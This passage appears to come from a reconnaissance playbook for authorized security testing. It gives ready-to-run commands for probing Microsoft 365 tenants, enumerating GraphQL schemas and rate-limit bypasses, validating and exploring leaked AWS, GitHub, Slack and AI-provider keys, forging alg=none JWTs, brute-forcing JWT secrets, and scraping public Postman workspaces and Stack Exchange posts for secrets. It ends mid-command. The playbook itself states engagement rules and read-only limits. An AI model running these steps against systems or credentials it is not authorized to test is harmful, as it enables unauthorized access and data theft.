22.8 Microsoft 365 Deep Enumeration (Teams / SharePoint / OneDrive / OAuth)

Teams federation status:

# Resolve tenant first
curl -sk -m 10 "https://login.microsoftonline.com/${TARGET_DOMAIN}/.well-known/openid-configuration" | jq -r '.issuer'
# Federation API requires authenticated request from a federated tenant; presence of error pattern reveals fed status
curl -sk -m 10 "https://teams.microsoft.com/api/mt/emea/beta/users/<email>/externalsearchv3"

SharePoint subdomain probe:

STEM=$(echo "$TARGET_DOMAIN" | cut -d. -f1)
for sub in "" "-my" "-admin"; do
  echo "=== ${STEM}${sub}.sharepoint.com ==="
  curl -sk -m 10 -I "https://${STEM}${sub}.sharepoint.com/" -w '%{http_code}\n'
done

Reading the result correctly: HTTP 200 from these probes means the tenant exists (Microsoft serves a generic redirect-to-auth page) — it does NOT mean anonymous access is granted to the tenant's content. Distinguish:

  • 200 → tenant provisioned (INFO).
  • 200 + redirect to a custom anonymous-share URL (/sites/<x>/Lists/<y>/AllItems.aspx?guestaccesstoken=...) discovered via dorks → HIGH (data exposure).
  • 401/403 → tenant exists but auth required (INFO).
  • 404 / NXDOMAIN → tenant not provisioned at this stem (or vanity-named — check known stems from cert transparency).

PowerShell:

$STEM = ($D -split '\.')[0]
foreach ($s in @("","-my","-admin")) {
  try {
    $r = Invoke-WebRequest -Uri "https://${STEM}${s}.sharepoint.com/" -Method Head -UseBasicParsing -TimeoutSec 10
    "${STEM}${s}.sharepoint.com -> HTTP $($r.StatusCode) (tenant exists)"
  } catch {
    $code = $_.Exception.Response.StatusCode.value__
    if ($code) { "${STEM}${s}.sharepoint.com -> HTTP $code" } else { "${STEM}${s}.sharepoint.com -> no host" }
  }
}

OneDrive personal site probe (for a known email alice@acme.com):

USER_TOKEN=$(echo "alice@acme.com" | tr '@.' '__')
STEM="acme"
curl -sk -m 10 -I "https://${STEM}-my.sharepoint.com/personal/${USER_TOKEN}/Documents/" -w '%{http_code}\n'
# 401 = exists; 404 = not provisioned
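
The same derivation as a small Python sketch, mirroring the `tr '@.' '__'` step above and the 401 / 404 reading from the comment. Function names are hypothetical, and any other status code is treated as inconclusive rather than guessed at.

```python
def onedrive_personal_url(email: str, tenant_stem: str) -> str:
    """Build the personal-site URL by replacing '@' and '.' in the email with '_'."""
    token = email.replace("@", "_").replace(".", "_")
    return f"https://{tenant_stem}-my.sharepoint.com/personal/{token}/Documents/"

def interpret_status(status: int) -> str:
    """Read the probe result the way the comment above does."""
    if status == 401:
        return "exists"
    if status == 404:
        return "not provisioned"
    return "inconclusive"
```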

M365 OAuth client_id discovery in JS:

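# Separator gets its own bracket: "[:" inside a bracket expression is parsed as a POSIX class opener
curl -sk -m 10 "https://app.target.example/main.js" | \
  grep -oE "clientId[\"']?[[:space:]]*[:=][[:space:]]*[\"']?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"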

Device-code phishing target check (look for device_authorization_endpoint in OIDC metadata):

curl -sk -m 10 "https://login.microsoftonline.com/${TARGET_DOMAIN}/v2.0/.well-known/openid-configuration" | \
  jq '.device_authorization_endpoint'

If non-null and tenant doesn't restrict device-code: MEDIUM finding (device-code phishing feasible).

Power Platform / Dynamics URLs to check:

  • *.crm.dynamics.com (per-region: crm, crm2-crm15, crm.dynamics.com).
  • *.api.crm.dynamics.com (Web API).
  • make.powerapps.com / flow.microsoft.com (auth-required dashboards).

Severity:

  • Discovered SharePoint/OneDrive tenants → INFO (asset only).
  • SharePoint anonymous-share link → HIGH (data exposure).
  • device_authorization_endpoint enabled on tenant → MEDIUM (operational risk).
  • Multi-tenant OAuth app with broad Graph scopes published by target → HIGH.

22.9 GraphQL Field-Suggestion Enumeration (when introspection disabled)

When the standard introspection query (§16.2) returns "errors":[{"message":"GraphQL introspection is disabled"}], fall back to field-suggestion enumeration. Apollo and most GraphQL libraries enable "did you mean" suggestions by default.

Detection probe:

curl -sk -m 10 -X POST "$T/graphql" \
  -H 'Content-Type: application/json' \
  -d '{"query":"{ __schema { types { name } } }"}' | jq -r '.errors[0].message'
# If "introspection disabled" → proceed.

Field-suggestion probe (intentionally typo a field name to trigger suggestions):

curl -sk -m 10 -X POST "$T/graphql" \
  -H 'Content-Type: application/json' \
  -d '{"query":"{ usre { id } }"}' | jq -r '.errors[].message'
# Expected: "Cannot query field \"usre\" on type \"Query\". Did you mean \"user\", \"users\", \"userById\"?"

Iterate over a candidate-field wordlist (use SecLists Discovery/Web-Content/graphql.txt or clairvoyance library's seed list). Each suggestion reveals real field names. Continue until no new suggestions emerge.
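
A sketch of the harvesting loop. It assumes error messages follow the "Did you mean ...?" shape shown above (with either quote style) and takes the HTTP call as an injected function, so `send_query` is a hypothetical callable that returns the list of error messages for one candidate field.

```python
import re
from typing import Callable, Iterable

NAME_RE = re.compile(r"""["']([_A-Za-z][_0-9A-Za-z]*)["']""")

def suggested_fields(message: str) -> list[str]:
    """Extract the quoted names that follow 'Did you mean' in one error message."""
    match = re.search(r"Did you mean (.*)\?", message)
    return NAME_RE.findall(match.group(1)) if match else []

def collect_fields(send_query: Callable[[str], list[str]],
                   wordlist: Iterable[str]) -> set[str]:
    """Probe each candidate once and union every suggested field name."""
    found: set[str] = set()
    for candidate in wordlist:
        for message in send_query(candidate):
            found.update(suggested_fields(message))
    return found
```

In practice `send_query` would POST `{ <candidate> { id } }` to the endpoint and return `[e["message"] for e in response["errors"]]`.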

Tooling:

  • Clairvoyance (pip install clairvoyance) — automated field-suggestion enumerator. clairvoyance -w wordlist.txt -o schema.json https://target.example/graphql.
  • GraphQL-Cop — auditor that probes for introspection, batching, depth-limit, suggestion config. pip install graphql-cop.
  • InQL — Burp Suite extension for GraphQL endpoint analysis.
  • GraphQL Voyager — visualize once schema is reconstructed.

Other GraphQL-when-introspection-disabled techniques:

  • Alias-based query batching (rate-limit / auth-bypass surface):

    {
      "query": "{ a:user(id:1){name} b:user(id:2){name} c:user(id:3){name} ... }"
    }
    

    Many APIs rate-limit per-request, not per-alias. Test 100+ aliases per request.

  • Query-depth-limit bypass (DoS / introspection bypass):

    {
      "query": "{ user { friends { friends { friends { friends { id } } } } } }"
    }
    

    If server allows arbitrary depth → DoS surface; if depth-limited but doesn't strip nested __type/__schema → introspection-via-depth.

  • Subscription enumeration via WebSocket:

    wscat -c "wss://target.example/graphql" -s graphql-ws
    > {"type":"connection_init"}
    > {"id":"1","type":"start","payload":{"query":"subscription { __schema { types { name } } }"}}
    
  • Batched query bypass (some servers process all queries in batch even if first fails):

    [
      {"query":"{ __schema { types { name } } }"},
      {"query":"{ user(id:1) { name } }"}
    ]
    

Severity:

  • Field-suggestion enumeration succeeds (50+ fields recoverable) → MEDIUM MISCONFIG.
  • Alias batching not rate-limited → MEDIUM (rate-limit-bypass surface).
  • Subscription endpoint exposed without auth → MEDIUM (often used for real-time data exfil).
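
For the alias-batching test described above, the request body can be generated rather than typed by hand. This is a sketch: the field, argument, and selection names are placeholders to be replaced with names recovered from the target schema, and the `alias_batch` helper is hypothetical.

```python
import json

def alias_batch(field: str, arg: str, values, selection: str = "name") -> str:
    """Build one JSON request body containing an aliased copy of the field per value."""
    parts = [
        f"a{i}:{field}({arg}:{json.dumps(value)}){{{selection}}}"
        for i, value in enumerate(values)
    ]
    return json.dumps({"query": "{ " + " ".join(parts) + " }"})
```

`alias_batch("user", "id", range(1, 101))` yields a single request carrying 100 aliased lookups, which is the shape needed to check whether rate limiting is applied per request or per alias.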

23. Read-Only Secret Validators

Use these to confirm a discovered credential is live. Read-only, never destructive. Tag every validation with detectability and checked_at (UTC).

23.1 Postman API Key (PMAK-*)

GET https://api.getpostman.com/me
Header: X-Api-Key: PMAK-<key>
  • 200 → live; response contains {user: {id, username, email}}.
  • 401 → dead.
  • Scope: full read access to the user's Postman account (collections, env vars, history).
  • Detectability: low.

23.2 AWS Access Key

sts:GetCallerIdentity

Use boto3:

import boto3
sts = boto3.client('sts',
    aws_access_key_id='<AKIA...>',
    aws_secret_access_key='<secret>',
    region_name='us-east-1')
ident = sts.get_caller_identity()
# ident['Account'], ident['Arn'], ident['UserId']
  • Valid → returns Account ID + ARN + UserId.
  • Invalid → InvalidClientTokenId or SignatureDoesNotMatch.
  • ARN scope: :user/ is IAM user (broad), :assumed-role/ is temp role (narrow), :root is account root (do NOT validate root keys you find).
  • Detectability: medium (CloudTrail logs GetCallerIdentity in account <found>).

23.3 GitHub PAT

GET https://api.github.com/user
Header: Authorization: token <ghp_*>
  • 200 → live; response contains login, id, name, email (if public).
  • Response header X-OAuth-Scopes lists token scopes. repo scope = write to all accessible repos; admin:org = org admin.
  • 401 → dead.
  • Detectability: low.

23.4 Slack Token

POST https://slack.com/api/auth.test
Header: Authorization: Bearer <xox*-*>
  • 200 with {"ok": true} → live; response includes team, team_id, user, user_id.
  • 200 with {"ok": false, "error": "invalid_auth"} → dead.
  • Detectability: low.

23.5 Anthropic API Key

GET https://api.anthropic.com/v1/models
Headers:
  x-api-key: sk-ant-api03-...
  anthropic-version: 2023-06-01
  • 200 → live; response lists available models.
  • 401 → dead.
  • 403 with org_disabled → key valid but org disabled.
  • Detectability: low; usage shows in Anthropic Console for the workspace owner.

23.6 OpenAI API Key

GET https://api.openai.com/v1/models
Header: Authorization: Bearer sk-...
  • 200 → live; lists models (may include org-specific fine-tunes).
  • 401 → dead.
  • 429 → live but quota exhausted.
  • Detectability: low; usage shows in OpenAI dashboard.

23.7 npm Token

GET https://registry.npmjs.org/-/whoami
Header: Authorization: Bearer npm_<token>
  • 200 with {"username": "<user>"} → live.
  • 401 → dead.
  • For scope check: GET /-/npm/v1/tokens returns the token's permissions (read/publish).
  • Detectability: low.

23.8 Atlassian API Token

GET https://<workspace>.atlassian.net/rest/api/3/myself
Auth: Basic <base64(email:ATATT3xFfGF0_...)>
  • 200 → live; returns account profile + email.
  • 401 → dead.
  • Workspace required — extract from leaked repo URL or Atlassian dork results.
  • Detectability: low.

23.9 DataDog API + APP Key

GET https://api.datadoghq.com/api/v1/validate
Headers:
  DD-API-KEY: <api-key>
  DD-APPLICATION-KEY: <app-key>
  • 200 → API key valid. This endpoint checks only DD-API-KEY; the application key is not verified by it.
  • 403 → API key invalid.
  • Per-region URL varies: api.datadoghq.eu, api.us3.datadoghq.com, etc.
  • Detectability: low; appears in DataDog audit log.

23.10 Validator output schema

{
  "status":          "verified_live" | "verified_dead" | "scope_restricted" |
                     "scope_unrestricted" | "validation_skipped_by_policy" |
                     "validation_unsupported" | "validation_failed_transient",
  "provider":        "postman" | "aws" | "github" | "slack" | "anthropic" | "openai" | "npm" | "atlassian" | "datadog",
  "account_id":      "<opaque>",
  "scope":           "<freeform>",
  "metadata":        {<provider-specific>},
  "checked_at":      "<UTC ISO8601>",
  "detectability":   "low" | "medium" | "high"
}

23.11 Hard rules

  • Read-only endpoint only.
  • Never use the validated credential to create, modify, delete, or send anything.
  • Tag every validation with detectability.
  • Record checked_at (UTC).
  • If RoE forbids validation → validation_skipped_by_policy, stop, document.
  • For root AWS keys, infrastructure-write GitHub PATs, or admin Slack tokens — flag for the operator and let them decide.

23.12 Post-Discovery Enumeration Workflows

After validation confirms a key is live, you often want to enumerate what it can do. Stay read-only.

AWS access key — IAM enum:

export AWS_ACCESS_KEY_ID="AKIA..."
export AWS_SECRET_ACCESS_KEY="..."

# Identity (already done as part of validation)
aws sts get-caller-identity

# IAM-user details (only if ARN was :user/)
aws iam get-user
aws iam list-attached-user-policies --user-name $(aws iam get-user --query 'User.UserName' --output text)
aws iam list-user-policies --user-name $(aws iam get-user --query 'User.UserName' --output text)
aws iam list-groups-for-user --user-name $(aws iam get-user --query 'User.UserName' --output text)

# What can I actually do? (simulate-principal-policy for common dangerous actions)
aws iam simulate-principal-policy \
  --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \
  --action-names s3:ListAllMyBuckets ec2:DescribeInstances iam:ListUsers \
                 secretsmanager:ListSecrets ssm:DescribeParameters \
                 lambda:ListFunctions rds:DescribeDBInstances

# Read-only enumeration of common services (do not WRITE)
aws s3 ls
aws ec2 describe-instances --output table --query 'Reservations[*].Instances[*].[InstanceId,State.Name,Tags[?Key==`Name`].Value]'
aws secretsmanager list-secrets --query 'SecretList[*].Name'
aws ssm describe-parameters --query 'Parameters[*].Name'
aws lambda list-functions --query 'Functions[*].FunctionName'
aws rds describe-db-instances --query 'DBInstances[*].DBInstanceIdentifier'

# CloudTrail check — is logging on?
aws cloudtrail describe-trails

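# MFA status: AccountMFAEnabled reports root-user MFA (1 = enabled), not per-user enforcement
aws iam get-account-summary | jq '.SummaryMap.AccountMFAEnabled'
# MFA devices registered for the IAM user
aws iam list-mfa-devices --user-name <username>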

GitHub PAT — repo enum:

TOKEN="ghp_..."
H="Authorization: token $TOKEN"

# Scopes already captured from X-OAuth-Scopes header
curl -sk -m 10 -I -H "$H" https://api.github.com/user | grep -i 'X-OAuth-Scopes'

# All repos accessible (own + collaborator + org member)
curl -sk -m 10 -H "$H" "https://api.github.com/user/repos?affiliation=owner,collaborator,organization_member&per_page=100"

# Org memberships
curl -sk -m 10 -H "$H" "https://api.github.com/user/orgs"

# Per-org: members, repos, secrets (secrets endpoint is metadata-only — names not values)
ORG="<orgname>"
curl -sk -m 10 -H "$H" "https://api.github.com/orgs/$ORG/members"
curl -sk -m 10 -H "$H" "https://api.github.com/orgs/$ORG/repos?per_page=100"
curl -sk -m 10 -H "$H" "https://api.github.com/orgs/$ORG/actions/secrets"   # requires admin:org

# Per-repo workflow secrets (metadata)
REPO="<orgname/reponame>"
curl -sk -m 10 -H "$H" "https://api.github.com/repos/$REPO/actions/secrets"

Slack token — workspace enum:

TOKEN="xoxb-..."
H="Authorization: Bearer $TOKEN"

# auth.test already validated
# Identity details (user tokens with the identity.basic scope only; bot tokens such as xoxb- get an error here)
curl -sk -m 10 -H "$H" -X POST "https://slack.com/api/users.identity" | jq .

# What conversations can I see? (sweeping check; respects scope)
curl -sk -m 10 -H "$H" -X POST "https://slack.com/api/conversations.list?types=public_channel,private_channel,mpim,im&limit=200" | jq '.channels[] | {id, name, is_private}'

# Workspace info
curl -sk -m 10 -H "$H" -X POST "https://slack.com/api/team.info" | jq .

# User list (only if scope includes users:read)
curl -sk -m 10 -H "$H" -X POST "https://slack.com/api/users.list?limit=100" | jq '.members[] | {name, real_name, is_admin}'

# DO NOT: chat.postMessage, files.upload, conversations.invite, etc.

JWT — full triage workflow:

JWT="eyJhbGciOiJIUzI1NiI..."

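# JWT segments are unpadded base64url, so plain `base64 -d` often fails on them.
# This helper restores the standard alphabet and padding before decoding.
b64url_decode() {
  local s
  s=$(printf '%s' "$1" | tr '_-' '/+')
  while [ $(( ${#s} % 4 )) -ne 0 ]; do s="${s}="; done
  printf '%s' "$s" | base64 -d
}

# Decode header
b64url_decode "$(echo "$JWT" | cut -d. -f1)" | jq .
# Look for: alg (none = critical, HS256/HS384/HS512 = symmetric, RS256/RS512 = asymmetric, ES256 = ECDSA)
# Look for: kid (key ID; a possible injection target)
# Look for: jku, x5u (key-source URLs; if attacker-controllable, forged tokens may verify)

# Decode payload
b64url_decode "$(echo "$JWT" | cut -d. -f2)" | jq .
# Look for: exp (an expired token lowers the finding's severity), iat, nbf
# Look for: sub, iss, aud (identity disclosure)
# Look for: roles, scopes, permissions (privilege markers)
# Look for: sensitive claims (email, employee ID, SSN, etc.)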

# Algorithm-confusion test (RS→HS)
# If alg is RS256, try crafting an HS256 token signed with the public key as secret
# Tools: jwt_tool, jwt-cracker

# Brute-force HS256 secret (if HS256 + short-secret suspicion)
hashcat -m 16500 "$JWT" /path/to/wordlist.txt
# Or: john --format=HMAC-SHA256 jwt-hash.txt --wordlist=...

# Check `none` algorithm bypass
# Re-encode header with alg=none and empty signature; some libraries accept
NEW_JWT=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 -w0 | tr -d '=' | tr '/+' '_-')
NEW_JWT="${NEW_JWT}.$(echo "$JWT" | cut -d. -f2)."
# Test against API
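
The decode-and-inspect half of the triage can also be sketched in stdlib Python, which avoids the base64url padding pitfalls of shell tools. The function names and the wording of the notes are illustrative assumptions; the sketch only decodes and labels what it sees and does not verify or forge signatures.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    """Decode an unpadded base64url segment, as used in JWTs."""
    padded = segment + "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(padded)


def triage_jwt(token: str) -> dict:
    """Decode header and payload, and note header fields worth a closer look."""
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))

    notes = []
    alg = str(header.get("alg", "")).lower()
    if alg == "none":
        notes.append("alg=none")
    elif alg.startswith("hs"):
        notes.append("symmetric (HMAC) signature")
    # Header fields that point at key material deserve manual review.
    for field in ("kid", "jku", "x5u"):
        if field in header:
            notes.append("header carries " + field)
    return {"header": header, "payload": payload, "notes": notes}
```

Calling triage_jwt(JWT) on a captured token returns the decoded header and payload plus the notes list, which can feed straight into the finding write-up.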

Postman PMAK — workspace enum:

PMAK="PMAK-..."
H="X-Api-Key: $PMAK"

# /me already done (validation)
curl -sk -m 10 -H "$H" https://api.getpostman.com/me | jq '.user'

# Workspaces
curl -sk -m 10 -H "$H" https://api.getpostman.com/workspaces | jq '.workspaces[] | {id, name, type}'

# Per-workspace collections
WS="<workspace-id>"
curl -sk -m 10 -H "$H" "https://api.getpostman.com/workspaces/$WS" | jq '.workspace.collections[]'
curl -sk -m 10 -H "$H" "https://api.getpostman.com/workspaces/$WS" | jq '.workspace.environments[]'

# Per-collection requests (where the secrets often live)
COL="<collection-id>"
curl -sk -m 10 -H "$H" "https://api.getpostman.com/collections/$COL" | jq '.collection.item[]'
# Run secret catalog over the JSON

# Environments (env vars often contain creds)
ENV="<environment-id>"
curl -sk -m 10 -H "$H" "https://api.getpostman.com/environments/$ENV" | jq '.environment.values[] | {key, value}'

Anthropic API key — usage enum:

KEY="sk-ant-api03-..."
H="x-api-key: $KEY"
A="anthropic-version: 2023-06-01"

# Models accessible
curl -sk -m 10 -H "$H" -H "$A" https://api.anthropic.com/v1/models | jq '.data[] | .id'

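# Usage report (Admin API keys, sk-ant-admin..., only; a standard API key is rejected).
# Set KEY to the admin key first; starting_at is required.
curl -sk -m 10 -H "$H" -H "$A" "https://api.anthropic.com/v1/organizations/usage_report/messages?starting_at=<UTC ISO8601>" | jq .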

# DO NOT: send actual completion requests against organization budget

OpenAI API key — usage enum:

KEY="sk-..."
H="Authorization: Bearer $KEY"

# Models
curl -sk -m 10 -H "$H" https://api.openai.com/v1/models | jq '.data | length'

# Org info (if key has org scope)
curl -sk -m 10 -H "$H" https://api.openai.com/v1/organizations | jq .

# Files / fine-tunes (sometimes contain training data with PII)
curl -sk -m 10 -H "$H" https://api.openai.com/v1/files | jq .
curl -sk -m 10 -H "$H" https://api.openai.com/v1/fine_tuning/jobs | jq .

Generic key — provenance enum:

  1. Find the consuming domain (where in JS bundle did the key appear? what URL is the bundle served from?).
  2. Check the API docs of the inferred service.
  3. If the key matches a known regex, look up the vendor-specific scope check.
  4. If the service is unknown, search GitHub for the key prefix (gh search code "<prefix>").
  5. Identify scope before validating; some keys are write-broad on first use.
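
Step 3 can be approximated with a prefix lookup before reaching for the full regex catalog. The sketch below is a rough first pass: the prefix table is assembled only from the placeholder key shapes shown in this section, the function name is an assumption, and a prefix match is a hint about the vendor, not proof.

```python
# Prefix -> provider, in match order. "sk-ant-" must come before the
# broader "sk-" so Anthropic keys are not labeled as OpenAI keys.
KNOWN_PREFIXES = [
    ("AKIA", "aws"),
    ("ghp_", "github"),
    ("xoxb-", "slack"),
    ("PMAK-", "postman"),
    ("sk-ant-", "anthropic"),
    ("sk-", "openai"),
]


def guess_provider(key: str):
    """Return the likely provider for a key, or None if no prefix matches."""
    for prefix, provider in KNOWN_PREFIXES:
        if key.startswith(prefix):
            return provider
    return None
```

A None result sends the key down the unknown-service path (steps 1, 2, and 4).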

24. Postman Public Workspace Universal Search

Postman's public-search endpoint is unauthenticated and indexes every workspace marked public.

Verified endpoint shape (mid-2025 onward):

curl -sk -m 15 \
  "https://www.postman.com/_api/ws/proxy" \
  -H 'Content-Type: application/json' \
  -H 'X-Entity-Team-Id: 0' \
  -d '{
    "service":"search",
    "method":"POST",
    "path":"/search-all",
    "body":{
      "queryIndices":["collaboration.workspace","runtime.collection","runtime.request"],
      "queryText":"acme.com",
      "size":100,
      "from":0,
      "clientTraceId":"",
      "queryAllIndices":false,
      "domain":"public"
    }
  }' | jq '.data[]'

This proxies through Postman's web app to their internal search service. Pagination via from (0, 100, 200, ...).
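
Pagination can be sketched as a generator that yields one request body per page. It mirrors the JSON shape shown above and builds payloads only (no network calls); the function name and the max_results cap are assumptions made for the example.

```python
def search_bodies(query_text, page_size=100, max_results=300):
    """Yield one proxy request body per page, stepping `from` by page_size."""
    for offset in range(0, max_results, page_size):
        yield {
            "service": "search",
            "method": "POST",
            "path": "/search-all",
            "body": {
                "queryIndices": [
                    "collaboration.workspace",
                    "runtime.collection",
                    "runtime.request",
                ],
                "queryText": query_text,
                "size": page_size,
                "from": offset,
                "clientTraceId": "",
                "queryAllIndices": False,
                "domain": "public",
            },
        }
```

Each yielded dict can be serialized with json.dumps and sent as the -d payload; stop early when a page comes back with fewer than page_size results.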

If the proxy shape changes (it has historically): inspect a real search request from the Postman web UI:

  1. Open https://www.postman.com/explore in a browser.
  2. Open DevTools → Network tab.
  3. Search for any term.
  4. Find the request to _api/... — copy as cURL — adapt.

Per-workspace walk:

For each matching workspace ID:

WS_ID="<workspace-id>"
# Workspace metadata (name, description, team, visibility)
curl -sk -m 10 "https://www.postman.com/_api/workspace/$WS_ID" | jq .

# List collections + environments + monitors in workspace
curl -sk -m 10 "https://www.postman.com/_api/workspace/$WS_ID/collection" | jq '.[].id'
curl -sk -m 10 "https://www.postman.com/_api/workspace/$WS_ID/environment" | jq '.[].id'

# Per-collection: full content (requests, headers, scripts, env vars)
COL_ID="<collection-id>"
curl -sk -m 10 "https://www.postman.com/_api/collection/$COL_ID" | jq '.collection.item[]'

Ownership scoring signals:

  • Creator/team name mentions target domain or brand → strong.
  • Workspace name/description mentions target → strong.
  • Request URLs contain *.target.com → strongest signal (workspace is actively used against target's APIs).
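
One way to turn these signals into a number is sketched below. The weights (30/30/40) and the workspace dict keys (team, name, description, request_urls) are assumptions chosen for illustration; the source only ranks the signals as strong, strong, and strongest.

```python
from urllib.parse import urlparse


def ownership_score(workspace, domain, brand):
    """Score 0-100 for how likely a public workspace belongs to the target."""
    needles = [n.lower() for n in (domain, brand) if n]
    domain = domain.lower()
    score = 0

    # Creator/team name mentions the target domain or brand (strong).
    team = workspace.get("team", "").lower()
    if any(n in team for n in needles):
        score += 30

    # Workspace name or description mentions the target (strong).
    text = (workspace.get("name", "") + " " + workspace.get("description", "")).lower()
    if any(n in text for n in needles):
        score += 30

    # A request URL points at the target domain or a subdomain (strongest).
    for url in workspace.get("request_urls", []):
        host = (urlparse(url).hostname or "").lower()
        if host == domain or host.endswith("." + domain):
            score += 40
            break
    return score
```

Matching on the parsed hostname rather than on a substring of the URL avoids false hits such as notacme.com or a target name that only appears in a query string.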

Run secret catalog (§17) over every text blob extracted from the requests, env vars, pre-request scripts, and test scripts.


25. Stack Exchange OSINT Sweep

Stack Exchange and its sister sites collect code paste-ins from developers — many include secrets, internal hostnames, and proprietary code excerpts.

Sites to query (8 with highest signal):

stackoverflow.com
serverfault.com
dba.stackexchange.com
devops.stackexchange.com
security.stackexchange.com
superuser.com
sharepoint.stackexchange.com
salesforce.stackexchange.com

API:

GET https://api.stackexchange.com/2.3/search/advanced
   ?site=<site>
   &q=<target>
   &filter=withbody
   &pagesize=100
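
A small URL builder keeps the query encoding correct when the target string contains spaces or quotes. The function name is an assumption; page is the API's standard paging parameter.

```python
from urllib.parse import urlencode

API_BASE = "https://api.stackexchange.com/2.3/search/advanced"


def search_url(site, target, page=1, pagesize=100):
    """Build a search/advanced URL for one site and one page of results."""
    params = {
        "site": site,
        "q": target,
        "filter": "withbody",  # include the post body HTML in each item
        "pagesize": pagesize,
        "page": page,
    }
    return API_BASE + "?" + urlencode(params)
```

For example, search_url("stackoverflow.com", "acme.com") yields the first page for one site; loop over the site list above and increment page while the response reports more results.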

Code block extraction regex:

<pre><code>([\s\S]*?)</code></pre>

(Stack Exchange wraps code in <pre><code> HTML.)
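
A minimal extraction sketch follows. It loosens the regex above to tolerate attributes on the tags (for example a language class on <pre>), which is an assumption about the markup, and it unescapes HTML entities so the secret catalog sees the code as the author typed it.

```python
import html
import re

# Same idea as the regex above, but tolerant of attributes on <pre>/<code>.
CODE_BLOCK = re.compile(r"<pre[^>]*><code[^>]*>([\s\S]*?)</code></pre>")


def extract_code_blocks(body_html: str) -> list:
    """Return the text of every <pre><code> block in a post body."""
    return [html.unescape(m) for m in CODE_BLOCK.findall(body_html)]
```

Unescaping matters because quotes and angle brackets inside code arrive as entities such as &quot; and &lt;, which would otherwise break pattern matches.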

Pipeline:

  1. Search each site for the target name, brand, root domain.
  2. Extract code blocks from body HTML.
  3. Run secret catalog (§17) over each block.
  4. Cross-reference post author profile details (display name, linked website or accounts; the API does not return email addresses) against email_osint discoveries. A match suggests an employee posting the target's internal code.
  5. Extract hostnames from code blocks → upsert as subdomain assets.

Quota: the Stack Exchange API permits 300 requests/day per IP without a key and 10,000/day with a free key. Throttle to at least 2 seconds between calls, and honor any backoff value the API returns.
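
The 2-second minimum interval can be enforced with a small throttle object. This is a sketch; the class name and the injectable clock and sleep parameters (there to make it testable) are assumptions.

```python
import time


class Throttle:
    """Block so that consecutive wait() calls are at least min_interval apart."""

    def __init__(self, min_interval=2.0, clock=time.monotonic, sleep=time.sleep):
        self.min_interval = min_interval
        self._clock = clock
        self._sleep = sleep
        self._last = None  # time of the previous call, None before the first

    def wait(self):
        now = self._clock()
        if self._last is not None:
            remaining = self.min_interval - (now - self._last)
            if remaining > 0:
                self._sleep(remaining)
                now = self._clock()
        self._last = now
```

Call throttle.wait() immediately before each API request; the first call returns at once, later calls sleep only for the time still owed.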


26. Public SaaS Collaboration Surfaces

Many SaaS collaboration tools allow public sharing. Dork them like search engines.

Platforms with high incident rate:

trello.com
notion.so / notion.site
*.atlassian.net           (Jira / Confluence)
miro.com
asana.com
clickup.com
airtable.com

Dork template:

site:{platform} "{target-keyword}"
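
Expanding the template across platforms and keywords is a simple product. The sketch below uses the platform list from this section (with *.atlassian.net written as atlassian.net, since site: already covers subdomains); the function name is an assumption.

```python
PLATFORMS = [
    "trello.com",
    "notion.so",
    "notion.site",
    "atlassian.net",
    "miro.com",
    "asana.com",
    "clickup.com",
    "airtable.com",
]


def build_dorks(keywords, platforms=PLATFORMS):
    """Return one site:-scoped dork per (keyword, platform) pair."""
    return ['site:{} "{}"'.format(p, k) for k in keywords for p in platforms]
```

Feeding the target name, brand, and root domain as keywords gives 24 queries for the eight platforms, which is small enough to run through a rate-limited search adapter.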

Run via search-engine adapter (DDG default; Bing / Brave / Yandex / SerpAPI optional). The same classification logic from §18.7 applies.

Common findings:

  • Public Trello board with credentials in card titles or attached config files.
  • Public Notion page with internal SOPs, API keys in code blocks, customer data.
  • Public Confluence space with onboarding docs containing seed creds.
  • Public Miro board with architecture diagrams revealing internal hostnames.

27. Subdomain-Source Stack (Passive)

Practical "what actually returns useful data in 2026" reference, ordered by recall:

| Source | Tier | Notes |
|---|---|---|
| crt.sh | Free | Best single source for cert-derived subdomains; frequently 502s during peak hours (see fallback chain below). |
| VirusTotal | Freemium | Domain → passive DNS history. |
| AlienVault OTX | Free | Passive DNS + URL data. |
| Shodan | Paid (low tier) | Subdomain enum via domain: filter. |
| BinaryEdge | Paid | Comparable to Shodan. |
| FOFA | Freemium | Strong China-side coverage. |
| ZoomEye | Freemium | Comparable to Shodan; CN-strong. |
| Netlas | Paid | Large-scale HTTP/DNS/cert pivots. |
| SecurityTrails | Paid | Passive DNS + asset discovery. |
| RapidDNS | Free | Public passive DNS. |
| Subfinder (bundled) | Free | Aggregates 30+ free sources via one CLI. |
| Amass | Free | Comparable, more thorough, slower. |
| Recon-ng | Free | Modular framework; many free providers built in. |

DNS AXFR opportunism: for every name server discovered, attempt zone transfer:

dig @<ns-host> <target-domain> AXFR

Most NSs reject; those that don't = full zone disclosure (CRITICAL).

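Brute-force tier: Subbrute (or a comparable resolver-based brute-forcer) against the Assetnote wordlists (wordlists.assetnote.io, the best-curated public wordlist source). Subfinder itself is passive and does not brute-force.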

27.0.1 crt.sh down? Fallback chain (try in order)

crt.sh runs on a single nginx in front of a busy Postgres; 502 / 503 / timeout in peak hours is routine. Don't retry-loop — pivot:

D="target.example"

# 1. Censys cert search (free 250 queries/month with key) — same data, different infra
censys search "names: ${D}" --index-type certificates --fields names | jq -r '.names[]' | sort -u

# 2. Cert Spotter API (sslmate) — free w/ rate limits
curl -sk "https://api.certspotter.com/v1/issuances?domain=${D}&include_subdomains=true&expand=dns_names" | \
  jq -r '.[].dns_names[]' | sort -u

# 3. CertStream archive (Calidog) — historical CT log mirror
curl -sk "https://crt.calidog.io/?q=${D}" | jq -r '.[].name_value' | sort -u

# 4. Subfinder bundled aggregator (uses 30+ sources internally — Chaos, Anubis, BinaryEdge, BufferOver, Censys, CertSpotter, Crobat, Crtsh, DNSDumpster, FOFA, Fullhunt, GitHub, HackerTarget, IntelX, PassiveTotal, Quake, Rapiddns, Shodan, Spyse, ThreatBook, ThreatMiner, URLScan, VirusTotal, WhoisXML, ZoomEye, etc.)
subfinder -d ${D} -all -recursive -silent

# 5. AlienVault OTX — free, no key
curl -sk "https://otx.alienvault.com/api/v1/indicators/domain/${D}/passive_dns" | \
  jq -r '.passive_dns[].hostname' | sort -u

# 6. ThreatMiner — free
curl -sk "https://api.threatminer.org/v2/d

